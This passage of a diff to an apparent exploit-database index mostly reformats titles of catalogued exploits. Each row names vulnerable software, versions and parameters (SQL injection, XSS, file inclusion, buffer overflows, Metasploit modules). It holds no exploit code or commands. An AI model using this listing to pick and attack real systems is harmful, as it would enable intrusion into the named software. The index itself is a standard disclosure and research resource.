28751,platforms/php/webapps/28751.txt,"osCommerce 2.2 - admin/products_attributes.php page Parameter XSS",2006-10-04,Lostmon,php,webapps,0 -28463,platforms/windows/dos/28463.html,"SolarWinds Server and Application Monitor ActiveX (Pepco32c) Buffer Overflow",2013-09-22,blake,windows,dos,0 +28463,platforms/windows/dos/28463.html,"SolarWinds Server and Application Monitor - ActiveX (Pepco32c) Buffer Overflow",2013-09-22,blake,windows,dos,0 28464,platforms/php/webapps/28464.txt,"VisualShapers EzContents 2.0.3 Headeruserdata.php SQL Injection",2006-08-30,DarkFig,php,webapps,0 28465,platforms/php/webapps/28465.txt,"VisualShapers EzContents 2.0.3 Loginreq2.php Cross-Site Scripting",2006-08-30,DarkFig,php,webapps,0 28466,platforms/php/webapps/28466.txt,"Learn.com Learncenter.ASP Cross-Site Scripting",2006-08-30,Crack_MaN,php,webapps,0 -28467,platforms/php/webapps/28467.txt,"ExBB 1.9.1 Home_Path Parameter Multiple Remote File Inclusion",2006-08-31,Matdhule,php,webapps,0 +28467,platforms/php/webapps/28467.txt,"ExBB 1.9.1 - Home_Path Parameter Multiple Remote File Inclusion",2006-08-31,Matdhule,php,webapps,0 28468,platforms/php/webapps/28468.txt,"YACS 6.6.1 - Multiple Remote File Inclusion",2006-09-01,MATASANOS,php,webapps,0 28450,platforms/hardware/remote/28450.py,"FiberHome Modem Router HG-110 - Authentication Bypass To Remote Change DNS Servers",2013-09-22,"Javier Perez",hardware,remote,0 28451,platforms/windows/dos/28451.txt,"Share KM 1.0.19 - Remote Denial of Service",2013-09-22,"Yuda Prawira",windows,dos,0 @@ -25527,10 +25527,10 @@ id,file,description,date,author,platform,type,port 28472,platforms/php/webapps/28472.txt,"Papoo CMS 3.2 IBrowser Remote File Inclusion",2006-09-01,Ironfist,php,webapps,0 28473,platforms/php/webapps/28473.txt,"Autentificator 2.01 Aut_Verifica.Inc.php SQL Injection",2006-09-02,SirDarckCat,php,webapps,0 28474,platforms/lin_x86/shellcode/28474.c,"Linux/x86 - Multi-Egghunter shellcode",2013-09-23,"Ryan Fenno",lin_x86,shellcode,0 -28480,platforms/windows/remote/28480.rb,"CA BrightStor ARCserve Tape Engine 0x8A Buffer Overflow (2)",2013-09-23,Metasploit,windows,remote,6502 +28480,platforms/windows/remote/28480.rb,"CA BrightStor ARCserve Tape Engine - 0x8A Buffer Overflow (2)",2013-09-23,Metasploit,windows,remote,6502 28481,platforms/windows/remote/28481.rb,"Microsoft Internet Explorer - CCaret Use-After-Free (MS13-069)",2013-09-23,Metasploit,windows,remote,0 28482,platforms/windows/remote/28482.rb,"Microsoft Windows Theme File Handling - Arbitrary Code Execution (MS13-071)",2013-09-23,Metasploit,windows,remote,0 -28483,platforms/php/remote/28483.rb,"GLPI install.php Remote Command Execution",2013-09-23,Metasploit,php,remote,80 +28483,platforms/php/remote/28483.rb,"GLPI - install.php Remote Command Execution",2013-09-23,Metasploit,php,remote,80 28484,platforms/hardware/remote/28484.rb,"Linksys WRT110 - Remote Command Execution",2013-09-23,Metasploit,hardware,remote,0 28485,platforms/php/webapps/28485.txt,"WordPress NOSpamPTI Plugin - Blind SQL Injection",2013-09-23,"Alexandro Silva",php,webapps,0 28486,platforms/php/webapps/28486.txt,"In-Portal In-Link 2.3.4 ADODB_DIR.php Remote File Inclusion",2006-09-04,"Saudi Hackrz",php,webapps,0 @@ -25544,8 +25544,8 @@ id,file,description,date,author,platform,type,port 28494,platforms/php/webapps/28494.txt,"AckerTodo 4.0 - Index.php Cross-Site Scripting",2006-09-07,viz.security,php,webapps,0 28495,platforms/php/webapps/28495.txt,"TWiki 4.0.x - Viewfile Directory Traversal",2006-09-07,"Peter Thoeny",php,webapps,0 28496,platforms/php/webapps/28496.php,"PHP-Fusion 6.0.x - News.php SQL Injection",2006-09-07,rgod,php,webapps,0 -28497,platforms/php/webapps/28497.txt,"Vikingboard Viking board 0.1b help.php act Parameter XSS",2006-09-08,Hessam-x,php,webapps,0 -28498,platforms/php/webapps/28498.txt,"Vikingboard Viking board 0.1b report.php p Parameter XSS",2006-09-08,Hessam-x,php,webapps,0 +28497,platforms/php/webapps/28497.txt,"Vikingboard Viking board 0.1b - help.php act Parameter XSS",2006-09-08,Hessam-x,php,webapps,0 +28498,platforms/php/webapps/28498.txt,"Vikingboard Viking board 0.1b - report.php p Parameter XSS",2006-09-08,Hessam-x,php,webapps,0 28499,platforms/php/webapps/28499.txt,"Vikingboard 0.1 Topic.php SQL Injection",2006-09-08,Hessam-x,php,webapps,0 28500,platforms/windows/remote/28500.txt,"Microsoft Indexing Service Query Validation Cross-Site Scripting",2006-09-12,"Eiji James Yoshida",windows,remote,0 28501,platforms/multiple/remote/28501.xml,"Sage 1.3.6 Input Validation",2006-09-08,pdp,multiple,remote,0 @@ -25555,7 +25555,7 @@ id,file,description,date,author,platform,type,port 28505,platforms/php/webapps/28505.txt,"PHProg 1.0 - Multiple Input Validation Vulnerabilities",2006-09-11,cdg393,php,webapps,0 29215,platforms/php/webapps/29215.txt,"FreeQBoard 1.0/1.1 QB_Path Parameter Multiple Remote File Inclusion",2006-12-27,Shell,php,webapps,0 28507,platforms/aix/local/28507.sh,"IBM AIX 6.1 / 7.1 - Local Privilege Escalation",2013-09-24,"Kristian Erik Hermansen",aix,local,0 -28508,platforms/hardware/remote/28508.rb,"Raidsonic NAS Devices Unauthenticated Remote Command Execution",2013-09-24,Metasploit,hardware,remote,0 +28508,platforms/hardware/remote/28508.rb,"Raidsonic NAS Devices - Unauthenticated Remote Command Execution",2013-09-24,Metasploit,hardware,remote,0 28510,platforms/php/webapps/28510.txt,"PHProg 1.0 - index.php album Parameter XSS",2006-09-11,cdg393,php,webapps,0 28511,platforms/php/webapps/28511.txt,"PHProg 1.0 - index.php lang Parameter Traversal Arbitrary File Access",2006-09-11,cdg393,php,webapps,0 28512,platforms/windows/remote/28512.txt,"paul smith computer services vcap calendar server 1.9 - Directory Traversal",2009-09-12,"securma massine",windows,remote,0 @@ -25603,7 +25603,7 @@ id,file,description,date,author,platform,type,port 28556,platforms/php/webapps/28556.txt,"e107 website system 0.7.5 - user.php Query String (PATH_INFO) Parameter XSS",2006-09-13,zark0vac,php,webapps,0 28557,platforms/php/webapps/28557.txt,"X2CRM 3.4.1 - Multiple Vulnerabilities",2013-09-25,"High-Tech Bridge SA",php,webapps,80 28558,platforms/linux/webapps/28558.txt,"ZeroShell 'cgi-bin/kerbynet' - Local File Disclosure",2013-09-25,"Yann CAM",linux,webapps,0 -28658,platforms/php/webapps/28658.txt,"MyPhotos 0.1.3b Index.php Remote File Inclusion",2006-09-23,Root3r_H3ll,php,webapps,0 +28658,platforms/php/webapps/28658.txt,"MyPhotos 0.1.3b - Index.php Remote File Inclusion",2006-09-23,Root3r_H3ll,php,webapps,0 28659,platforms/palm_os/webapps/28659.txt,"Jamroom 3.0.16 - Login.php Cross-Site Scripting",2006-09-24,meto5757,palm_os,webapps,0 28660,platforms/php/webapps/28660.php,"CPanel 5-10 - SUID Wrapper Remote Privilege Escalation",2006-09-24,"Nima Salehi",php,webapps,0 28560,platforms/php/webapps/28560.txt,"Piwigo 2.5.2 - Cross-Site Scripting",2013-09-26,Arsan,php,webapps,0 @@ -25653,10 +25653,10 @@ id,file,description,date,author,platform,type,port 28603,platforms/php/webapps/28603.txt,"Innovate Portal 2.0 - Index.php Cross-Site Scripting",2006-09-19,meto5757,php,webapps,0 28604,platforms/php/webapps/28604.txt,"ESyndiCat 1.5 - Search.php Cross-Site Scripting",2006-09-19,meto5757,php,webapps,0 28605,platforms/jsp/webapps/28605.txt,"NeoSys Neon Webmail for Java 5.06/5.07 - downloadfile Servlet Traversal Arbitrary File Access",2006-09-20,"Tan Chew Keong",jsp,webapps,0 -28606,platforms/jsp/webapps/28606.txt,"NeoSys Neon Webmail for Java 5.06/5.07 updatemail Servlet Arbitrary Mail Message Manipulation",2006-09-20,"Tan Chew Keong",jsp,webapps,0 +28606,platforms/jsp/webapps/28606.txt,"NeoSys Neon Webmail for Java 5.06/5.07 updatemail Servlet - Arbitrary Mail Message Manipulation",2006-09-20,"Tan Chew Keong",jsp,webapps,0 28607,platforms/jsp/webapps/28607.txt,"NeoSys Neon Webmail for Java 5.06/5.07 - addrlist Servlet Multiple Parameter SQL Injection",2006-09-20,"Tan Chew Keong",jsp,webapps,0 28608,platforms/jsp/webapps/28608.txt,"NeoSys Neon Webmail for Java 5.06/5.07 maillist Servlet Multiple Parameter SQL Injection",2006-09-20,"Tan Chew Keong",jsp,webapps,0 -28609,platforms/jsp/webapps/28609.txt,"NeoSys Neon Webmail for Java 5.06/5.07 updateuser Servlet in_id Variable Arbitrary User Information Modification",2006-09-20,"Tan Chew Keong",jsp,webapps,0 +28609,platforms/jsp/webapps/28609.txt,"NeoSys Neon Webmail for Java 5.06/5.07 updateuser Servlet in_id Variable - Arbitrary User Information Modification",2006-09-20,"Tan Chew Keong",jsp,webapps,0 28610,platforms/jsp/webapps/28610.txt,"NeoSys Neon Webmail for Java 5.06/5.07 updateuser Servlet in_name Parameter XSS",2006-09-20,"Tan Chew Keong",jsp,webapps,0 28611,platforms/php/webapps/28611.txt,"RedBLoG 0.5 imgen.php Root Parameter Remote File Inclusion",2006-09-19,Root3r_H3ll,php,webapps,0 28612,platforms/php/webapps/28612.txt,"RedBLoG 0.5 - admin/config.php root_path Parameter Remote File Inclusion",2006-09-19,Root3r_H3ll,php,webapps,0 @@ -25754,7 +25754,7 @@ id,file,description,date,author,platform,type,port 28733,platforms/php/webapps/28733.txt,"Yblog tem.php action Parameter XSS",2006-09-30,You_You,php,webapps,0 28734,platforms/php/webapps/28734.txt,"Yblog uss.php action Parameter XSS",2006-09-30,You_You,php,webapps,0 28735,platforms/windows/dos/28735.pl,"MailEnable 2.x - SMTP NTLM Authentication - Multiple Vulnerabilities",2006-11-29,mu-b,windows,dos,0 -29275,platforms/cgi/webapps/29275.txt,"Netwin SurgeFTP 2.3a1 SurgeFTPMGR.CGI Multiple Input Validation Vulnerabilities",2006-12-11,"Umesh Wanve",cgi,webapps,0 +29275,platforms/cgi/webapps/29275.txt,"Netwin SurgeFTP 2.3a1 - SurgeFTPMGR.CGI Multiple Input Validation Vulnerabilities",2006-12-11,"Umesh Wanve",cgi,webapps,0 29276,platforms/asp/webapps/29276.txt,"Lotfian Request For Travel 1.0 - ProductDetails.ASP SQL Injection",2006-12-11,ajann,asp,webapps,0 28728,platforms/php/webapps/28728.txt,"Geotarget Script.php Remote File Inclusion",2006-09-29,"RaVeR shi mozi",php,webapps,0 28708,platforms/php/webapps/28708.txt,"elproLOG MONITOR WebAccess 2.1 - Multiple Vulnerabilities",2013-10-04,Vulnerability-Lab,php,webapps,80 @@ -25778,7 +25778,7 @@ id,file,description,date,author,platform,type,port 28737,platforms/php/webapps/28737.txt,"PHP Web Scripts Easy Banner Functions.php Remote File Inclusion",2006-10-02,"abu ahmed",php,webapps,0 28738,platforms/php/webapps/28738.txt,"Digishop 4.0 Cart.php Cross-Site Scripting",2006-10-02,meto5757,php,webapps,0 28739,platforms/hardware/dos/28739.pl,"Motorola SB4200 - Remote Denial of Service",2006-10-03,"Dave Gil",hardware,dos,0 -28740,platforms/php/webapps/28740.txt,"HAMweather 3.9.8 Template.php Script Code Injection",2006-10-03,"James Bercegay",php,webapps,0 +28740,platforms/php/webapps/28740.txt,"HAMweather 3.9.8 - Template.php Script Code Injection",2006-10-03,"James Bercegay",php,webapps,0 28741,platforms/php/webapps/28741.txt,"Yener Haber Script 1.0/2.0 - SQL Injection",2006-10-04,Dj_ReMix,php,webapps,0 28742,platforms/asp/webapps/28742.txt,"ASPPlayGround.NET Forum 2.4.5 Calendar.ASP Cross-Site Scripting",2006-10-27,MizoZ,asp,webapps,0 28743,platforms/php/webapps/28743.txt,"osCommerce 2.2 - admin/banner_manager.php page Parameter XSS",2006-10-04,Lostmon,php,webapps,0 @@ -25814,10 +25814,10 @@ id,file,description,date,author,platform,type,port 28776,platforms/php/webapps/28776.txt,"EXPBlog 0.3.5 - Multiple Cross-Site Scripting Vulnerabilities",2006-10-09,Tamriel,php,webapps,0 28777,platforms/php/webapps/28777.txt,"Hastymail 1.x - IMAP SMTP Command Injection",2006-10-10,"Vicente Aguilera Diaz",php,webapps,0 28778,platforms/php/webapps/28778.txt,"ironwebmail 6.1.1 - Directory Traversal information disclosure",2006-10-16,"Derek Callaway",php,webapps,0 -28779,platforms/php/webapps/28779.txt,"Album Photo Sans Nom 1.6 Getimg.php Remote File Inclusion",2006-10-10,DarkFig,php,webapps,0 +28779,platforms/php/webapps/28779.txt,"Album Photo Sans Nom 1.6 - Getimg.php Remote File Inclusion",2006-10-10,DarkFig,php,webapps,0 28780,platforms/php/webapps/28780.txt,"Softerra PHP Developer Library 1.5.3 Grid3.lib.php Remote File Inclusion",2006-10-10,k1tk4t,php,webapps,0 28781,platforms/php/webapps/28781.txt,"BlueShoes Framework 4.6 GoogleSearch.php Remote File Inclusion",2006-10-10,k1tk4t,php,webapps,0 -28782,platforms/php/webapps/28782.txt,"Tagit2b DelTagUser.php Remote File Inclusion",2006-10-10,k1tk4t,php,webapps,0 +28782,platforms/php/webapps/28782.txt,"Tagit2b - DelTagUser.php Remote File Inclusion",2006-10-10,k1tk4t,php,webapps,0 28783,platforms/php/webapps/28783.txt,"MySQLDumper 1.21 - SQL.php Cross-Site Scripting",2006-10-10,Crackers_Child,php,webapps,0 28784,platforms/php/webapps/28784.txt,"Gcards 1.13 Addnews.php Remote File Inclusion",2006-10-11,"DeatH VirUs",php,webapps,0 28785,platforms/windows/dos/28785.c,"Google Earth 4.0.2091 (beta) - KML/KMZ Files Buffer Overflow",2006-09-14,JAAScois,windows,dos,0 @@ -25826,7 +25826,7 @@ id,file,description,date,author,platform,type,port 28788,platforms/solaris/local/28788.sh,"Sun Solaris Netscape Portable Runtime API 4.6.1 - Local Privilege Escalation (1)",2006-10-13,"Marco Ivaldi",solaris,local,0 28789,platforms/solaris/local/28789.sh,"Sun Solaris Netscape Portable Runtime API 4.6.1 - Local Privilege Escalation (2)",2006-10-24,"Marco Ivaldi",solaris,local,0 28790,platforms/php/webapps/28790.txt,"PHPList 2.x - Public Pages MultipleCross-Site Scripting Vulnerabilities",2006-10-12,"Michiel Dethmers",php,webapps,0 -28791,platforms/php/webapps/28791.txt,"PHP TopSites FREE 1.022b Config.php Remote File Inclusion",2006-10-12,"Le CoPrA",php,webapps,0 +28791,platforms/php/webapps/28791.txt,"PHP TopSites FREE 1.022b - Config.php Remote File Inclusion",2006-10-12,"Le CoPrA",php,webapps,0 28792,platforms/php/webapps/28792.txt,"MamboLaiThai ExtCalThai 0.9.1 - admin_events.php CONFIG_EXT[LANGUAGES_DIR] Parameter Remote File Inclusion",2006-10-12,k1tk4t,php,webapps,0 28793,platforms/php/webapps/28793.txt,"MamboLaiThai ExtCalThai 0.9.1 - mail.inc.php CONFIG_EXT[LIB_DIR] Parameter Remote File Inclusion",2006-10-12,k1tk4t,php,webapps,0 28794,platforms/php/webapps/28794.txt,"4Images 1.7 - Details.php Cross-Site Scripting",2006-10-12,"Christian Marthen",php,webapps,0 @@ -25845,19 +25845,19 @@ id,file,description,date,author,platform,type,port 28806,platforms/linux/local/28806.txt,"davfs2 1.4.6/1.4.7 - Local Privilege Escalation Exploit",2013-10-08,"Lorenzo Cantoni",linux,local,0 28807,platforms/php/webapps/28807.py,"WHMCS 5.2.7 - SQL Injection",2013-10-08,localhost.re,php,webapps,0 28808,platforms/php/webapps/28808.txt,"WordPress Quick Contact Form Plugin 6.0 - Persistent XSS",2013-10-08,Zy0d0x,php,webapps,0 -28809,platforms/windows/remote/28809.rb,"HP LoadRunner magentproc.exe Overflow",2013-10-08,Metasploit,windows,remote,443 -28810,platforms/unix/remote/28810.rb,"GestioIP Remote Command Execution",2013-10-08,Metasploit,unix,remote,0 +28809,platforms/windows/remote/28809.rb,"HP LoadRunner - magentproc.exe Overflow",2013-10-08,Metasploit,windows,remote,443 +28810,platforms/unix/remote/28810.rb,"GestioIP - Remote Command Execution",2013-10-08,Metasploit,unix,remote,0 28811,platforms/osx/dos/28811.txt,"Apple Motion 5.0.7 - Integer Overflow",2013-10-08,"Jean Pascal Pereira",osx,dos,0 28812,platforms/freebsd/dos/28812.c,"FreeBSD 5.5/6.x - Scheduler Policy Local Denial of Service",2006-10-13,"Diane Bruce",freebsd,dos,0 28813,platforms/freebsd/dos/28813.c,"FreeBSD 6.0/6.1 Ftrucante Local Denial of Service",2006-10-13,"Kirk Russell",freebsd,dos,0 28814,platforms/php/webapps/28814.txt,"RamaCMS ADODB.Inc.php Remote File Inclusion",2006-10-13,"Le CoPrA",php,webapps,0 28815,platforms/php/webapps/28815.txt,"H-Sphere 2.x - WebShell Login.php Cross-Site Scripting",2006-10-14,b0rizQ,php,webapps,0 28816,platforms/linux/dos/28816.txt,"KMail 1.x - HTML Element Handling Denial of Service",2006-10-16,nnp,linux,dos,0 -28817,platforms/multiple/local/28817.txt,"Internet Security Systems 3.6 = ZWDeleteFile Function Arbitrary File Deletion",2006-10-16,"Matousec Transparent security",multiple,local,0 +28817,platforms/multiple/local/28817.txt,"Internet Security Systems 3.6 = ZWDeleteFile Function - Arbitrary File Deletion",2006-10-16,"Matousec Transparent security",multiple,local,0 28818,platforms/php/webapps/28818.txt,"Mambo MostlyCE 4.5.4 - HTMLTemplate.php Remote File Inclusion",2006-10-16,The_BeKiR,php,webapps,0 28819,platforms/php/webapps/28819.txt,"Lodel CMS 0.7.3 Calcul-Page.php Remote File Inclusion",2006-10-17,The_BeKiR,php,webapps,0 28820,platforms/php/webapps/28820.txt,"Webgenius Goop Gallery 2.0 - Index.php Cross-Site Scripting",2006-10-17,Lostmon,php,webapps,0 -28821,platforms/php/webapps/28821.txt,"Maintain 3.0.0-RC2 Example6.php Remote File Inclusion",2006-10-16,ERNE,php,webapps,0 +28821,platforms/php/webapps/28821.txt,"Maintain 3.0.0-RC2 - Example6.php Remote File Inclusion",2006-10-16,ERNE,php,webapps,0 28822,platforms/windows/dos/28822.txt,"Microsoft Class Package Export Tool 5.0.2752 - Clspack.exe Local Buffer Overflow",2006-10-16,mmd_000,windows,dos,0 28823,platforms/php/webapps/28823.pl,"PowerMovieList 0.13/0.14 Edit User HTML Injection",2006-10-16,MP,php,webapps,0 28824,platforms/php/webapps/28824.txt,"PHPList 2.10.2 - Index.php Cross-Site Scripting",2006-10-17,b0rizQ,php,webapps,0 @@ -25869,7 +25869,7 @@ id,file,description,date,author,platform,type,port 28830,platforms/php/webapps/28830.pl,"Free FAQ 1.0 - Index.php Remote File Inclusion",2006-10-19,"Alireza Ahari",php,webapps,0 28831,platforms/php/webapps/28831.txt,"Simple Machines Forum 1.0/1.1 - Index.php Cross-Site Scripting",2006-10-19,b0rizQ,php,webapps,0 28832,platforms/php/webapps/28832.txt,"ATutor 1.5.3 - Multiple Remote File Inclusion",2006-10-19,SuBzErO,php,webapps,0 -28833,platforms/php/webapps/28833.pl,"Casinosoft Casino Script 3.2 Config.php SQL Injection",2006-10-20,G1UK,php,webapps,0 +28833,platforms/php/webapps/28833.pl,"Casinosoft Casino Script 3.2 - Config.php SQL Injection",2006-10-20,G1UK,php,webapps,0 28834,platforms/windows/dos/28834.txt,"Microsoft Windows XP CMD.EXE Buffer Overflow",2006-10-20,"Alberto Cortes",windows,dos,0 28835,platforms/novell/remote/28835.pl,"Novell eDirectory 8.x - iMonitor HTTPSTK Buffer Overflow (1)",2006-10-21,"Manuel Santamarina Suarez",novell,remote,0 28836,platforms/novell/remote/28836.c,"Novell eDirectory 8.x - iMonitor HTTPSTK Buffer Overflow (2)",2006-10-30,Expanders,novell,remote,0 @@ -25949,7 +25949,7 @@ id,file,description,date,author,platform,type,port 28911,platforms/solaris/dos/28911.txt,"Sun Solaris 10 UFS Local Denial of Service",2006-11-04,LMH,solaris,dos,0 28913,platforms/php/webapps/28913.txt,"@cid Stats 2.3 - Install.php3 Remote File Inclusion",2006-11-06,Mahmood_ali,php,webapps,0 28914,platforms/php/webapps/28914.txt,"Xoops 2.0.5 NewList.php Cross-Site Scripting",2006-11-06,CvIr.System,php,webapps,0 -28915,platforms/php/webapps/28915.txt,"Article Script 1.6.3 RSS.php SQL Injection",2006-11-06,Liz0ziM,php,webapps,0 +28915,platforms/php/webapps/28915.txt,"Article Script 1.6.3 - RSS.php SQL Injection",2006-11-06,Liz0ziM,php,webapps,0 28916,platforms/windows/remote/28916.rb,"America Online ICQ 5.1 - ActiveX Control Remote Code Execution",2006-11-06,"Peter Vreugdenhil",windows,remote,0 28912,platforms/linux/dos/28912.txt,"Linux Kernel 2.6.x ISO9660 - Denial of Service",2006-11-05,LMH,linux,dos,0 28917,platforms/php/webapps/28917.txt,"AIOCP 1.3.x - cp_forum_view.php Multiple Parameter XSS",2006-11-06,"laurent gaffie",php,webapps,0 @@ -25976,7 +25976,7 @@ id,file,description,date,author,platform,type,port 28938,platforms/php/webapps/28938.txt,"IPManager 2.3 - Index.php Cross-Site Scripting",2006-11-07,spaceballyopsolo,php,webapps,0 28939,platforms/php/webapps/28939.txt,"Kayako SupportSuite 3.0.32 - Index.php Cross-Site Scripting",2006-11-07,Dr.HAiL,php,webapps,0 28940,platforms/php/webapps/28940.txt,"PHPMyChat 0.14/0.15 - Languages.Lib.php Local File Inclusion",2006-11-08,ajann,php,webapps,0 -28941,platforms/asp/webapps/28941.txt,"Immediacy .NET CMS 5.2 Logon.ASPX Cross-Site Scripting",2006-11-08,"Gemma Hughes",asp,webapps,0 +28941,platforms/asp/webapps/28941.txt,"Immediacy .NET CMS 5.2 - Logon.ASPX Cross-Site Scripting",2006-11-08,"Gemma Hughes",asp,webapps,0 28942,platforms/php/webapps/28942.txt,"FreeWebshop 2.1/2.2 - index.php page Parameter Traversal Arbitrary File Access",2006-11-08,"laurent gaffie",php,webapps,0 28943,platforms/php/webapps/28943.txt,"FreeWebshop 2.1/2.2 - index.php cat Parameter XSS",2006-11-08,"laurent gaffie",php,webapps,0 28944,platforms/php/webapps/28944.txt,"Abarcar Realty Portal 5.1.5/6.0.1 - Multiple SQL Injection",2006-11-08,"Benjamin Moss",php,webapps,0 @@ -26002,7 +26002,7 @@ id,file,description,date,author,platform,type,port 28965,platforms/php/webapps/28965.txt,"Bitweaver 1.x - wiki/list_pages.php sort_mode Parameter SQL Injection",2006-11-10,"laurent gaffie",php,webapps,0 28966,platforms/php/webapps/28966.txt,"Drake CMS 0.2 - Index.php Cross-Site Scripting",2006-11-10,CorryL,php,webapps,0 28967,platforms/php/webapps/28967.txt,"ExoPHPdesk 1.2 Pipe.php Remote File Inclusion",2006-11-11,Firewall1954,php,webapps,0 -28968,platforms/windows/remote/28968.html,"Aladdin Knowledge Systems Ltd. PrivAgent ActiveX Control Overflow",2013-10-15,blake,windows,remote,0 +28968,platforms/windows/remote/28968.html,"Aladdin Knowledge Systems Ltd. PrivAgent - ActiveX Control Overflow",2013-10-15,blake,windows,remote,0 28969,platforms/windows/local/28969.py,"Beetel Connection Manager PCW_BTLINDV1.0.0B04 - SEH Buffer Overflow",2013-10-15,metacom,windows,local,0 28970,platforms/php/webapps/28970.txt,"Dexs PM System WordPress Plugin - Authenticated Persistent XSS (0Day)",2013-10-15,TheXero,php,webapps,80 28971,platforms/php/webapps/28971.py,"Dolibarr ERP/CMS 3.4.0 - (exportcsv.php sondage param) SQL Injection",2013-10-15,drone,php,webapps,80 @@ -26131,8 +26131,8 @@ id,file,description,date,author,platform,type,port 29156,platforms/asp/webapps/29156.txt,"CreaDirectory 1.2 - search.asp search Parameter XSS",2006-11-21,"laurent gaffie",asp,webapps,0 29211,platforms/php/webapps/29211.txt,"WordPress Curvo Themes - CSRF File Upload",2013-10-26,"Byakuya Kouta",php,webapps,0 29118,platforms/asp/webapps/29118.txt,"Enthrallweb eClassifieds ad.asp Multiple Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 -29093,platforms/asp/webapps/29093.txt,"Texas Rankem player.asp selPlayer Parameter SQL Injection",2006-11-18,"Aria-Security Team",asp,webapps,0 -29094,platforms/asp/webapps/29094.txt,"Texas Rankem tournaments.asp tournament_id Parameter SQL Injection",2006-11-18,"Aria-Security Team",asp,webapps,0 +29093,platforms/asp/webapps/29093.txt,"Texas Rankem - player.asp selPlayer Parameter SQL Injection",2006-11-18,"Aria-Security Team",asp,webapps,0 +29094,platforms/asp/webapps/29094.txt,"Texas Rankem - tournaments.asp tournament_id Parameter SQL Injection",2006-11-18,"Aria-Security Team",asp,webapps,0 29095,platforms/php/webapps/29095.txt,"Blog:CMS 4.1.3 List.php Cross-Site Scripting",2006-11-18,Katatafish,php,webapps,0 29096,platforms/windows/remote/29096.rb,"NetGear MA521 Wireless Driver 5.148.724 Long Beacon Probe Buffer Overflow",2006-11-18,"Laurent Butti",windows,remote,0 29097,platforms/php/webapps/29097.txt,"Boonex 2.0 Dolphin - Index.php Remote File Inclusion",2006-11-20,S.W.A.T.,php,webapps,0 @@ -26168,7 +26168,7 @@ id,file,description,date,author,platform,type,port 29128,platforms/php/webapps/29128.txt,"Vikingboard 0.1.2 - admin.php act Parameter Traversal Arbitrary File Access",2006-11-20,"laurent gaffie",php,webapps,0 29129,platforms/windows/remote/29129.rb,"Interactive Graphical SCADA System Remote Command Injection",2013-10-22,Metasploit,windows,remote,12397 29130,platforms/windows/remote/29130.rb,"HP Intelligent Management Center BIms UploadServlet Directory Traversal",2013-10-22,Metasploit,windows,remote,8080 -29131,platforms/hardware/webapps/29131.rb,"ARRIS DG860A NVRAM Backup Password Disclosure",2013-10-22,"Justin Oberdorf",hardware,webapps,80 +29131,platforms/hardware/webapps/29131.rb,"ARRIS DG860A - NVRAM Backup Password Disclosure",2013-10-22,"Justin Oberdorf",hardware,webapps,80 29132,platforms/unix/remote/29132.rb,"WebTester 5.x - Command Execution",2013-10-22,Metasploit,unix,remote,80 29133,platforms/asp/webapps/29133.txt,"Rapid Classified 3.1 viewad.asp id Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 29134,platforms/asp/webapps/29134.txt,"Rapid Classified 3.1 view_print.asp id Parameter XSS",2006-11-20,"laurent gaffie",asp,webapps,0 @@ -26184,7 +26184,7 @@ id,file,description,date,author,platform,type,port 29143,platforms/asp/webapps/29143.txt,"Klf-Realty 2.0 detail.asp property_id Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 29144,platforms/osx/dos/29144.txt,"Apple Mac OS X 10.4.8 -UDIF Disk Image Remote Denial of Service",2006-11-20,LMH,osx,dos,0 29145,platforms/php/webapps/29145.txt,"Wabbit PHP Gallery 0.9 Dir Parameter Directory Traversal",2006-11-20,the_Edit0r,php,webapps,0 -29146,platforms/windows/remote/29146.c,"Novell Client 4.91 NWSPOOL.DLL Remote Buffer Overflow",2006-11-21,"Andres Tarasco Acuna",windows,remote,0 +29146,platforms/windows/remote/29146.c,"Novell Client 4.91 - NWSPOOL.DLL Remote Buffer Overflow",2006-11-21,"Andres Tarasco Acuna",windows,remote,0 34371,platforms/windows/local/34371.py,"BlazeDVD Pro 7.0 - (.plf) Buffer Overflow (SEH)",2014-08-20,metacom,windows,local,0 29161,platforms/osx/dos/29161.txt,"Apple Mac OS X 10.4.8 - UDTO Disk Image Remote Denial of Service",2006-11-21,LMH,osx,dos,0 29162,platforms/php/webapps/29162.txt,"My Little Weblog 2006.11.21 - Weblog.php Cross-Site Scripting",2006-11-21,the_Edit0r,php,webapps,0 @@ -26262,13 +26262,13 @@ id,file,description,date,author,platform,type,port 29244,platforms/php/webapps/29244.txt,"Messageriescripthp 2.0 existeemail.php email Parameter XSS",2006-12-09,Mr_KaLiMaN,php,webapps,0 29245,platforms/php/webapps/29245.txt,"Messageriescripthp 2.0 Contact/contact.php Multiple Parameter XSS",2006-12-09,Mr_KaLiMaN,php,webapps,0 29246,platforms/php/webapps/29246.txt,"AnnonceScriptHP 2.0 - admin/admin_membre/fiche_membre.php idmembre Parameter SQL Injection",2006-12-09,Mr_KaLiMaN,php,webapps,0 -29247,platforms/php/webapps/29247.txt,"AnnonceScriptHP 2.0 erreurinscription.php email Parameter XSS",2006-12-09,Mr_KaLiMaN,php,webapps,0 -29248,platforms/php/webapps/29248.txt,"AnnonceScriptHP 2.0 Templates/admin.dwt.php email Parameter XSS",2006-12-09,Mr_KaLiMaN,php,webapps,0 -29249,platforms/php/webapps/29249.txt,"AnnonceScriptHP 2.0 Templates/commun.dwt.php email Parameter XSS",2006-12-09,Mr_KaLiMaN,php,webapps,0 -29250,platforms/php/webapps/29250.txt,"AnnonceScriptHP 2.0 membre.dwt.php email Parameter XSS",2006-12-09,Mr_KaLiMaN,php,webapps,0 +29247,platforms/php/webapps/29247.txt,"AnnonceScriptHP 2.0 - erreurinscription.php email Parameter XSS",2006-12-09,Mr_KaLiMaN,php,webapps,0 +29248,platforms/php/webapps/29248.txt,"AnnonceScriptHP 2.0 - Templates/admin.dwt.php email Parameter XSS",2006-12-09,Mr_KaLiMaN,php,webapps,0 +29249,platforms/php/webapps/29249.txt,"AnnonceScriptHP 2.0 - Templates/commun.dwt.php email Parameter XSS",2006-12-09,Mr_KaLiMaN,php,webapps,0 +29250,platforms/php/webapps/29250.txt,"AnnonceScriptHP 2.0 - membre.dwt.php email Parameter XSS",2006-12-09,Mr_KaLiMaN,php,webapps,0 29251,platforms/php/webapps/29251.txt,"AnnonceScriptHP 2.0 - admin/admin_config/Aide.php email Parameter XSS",2006-12-09,Mr_KaLiMaN,php,webapps,0 29252,platforms/php/webapps/29252.txt,"AnnonceScriptHP 2.0 - email.php id Parameter SQL Injection",2006-12-09,Mr_KaLiMaN,php,webapps,0 -29253,platforms/php/webapps/29253.txt,"AnnonceScriptHP 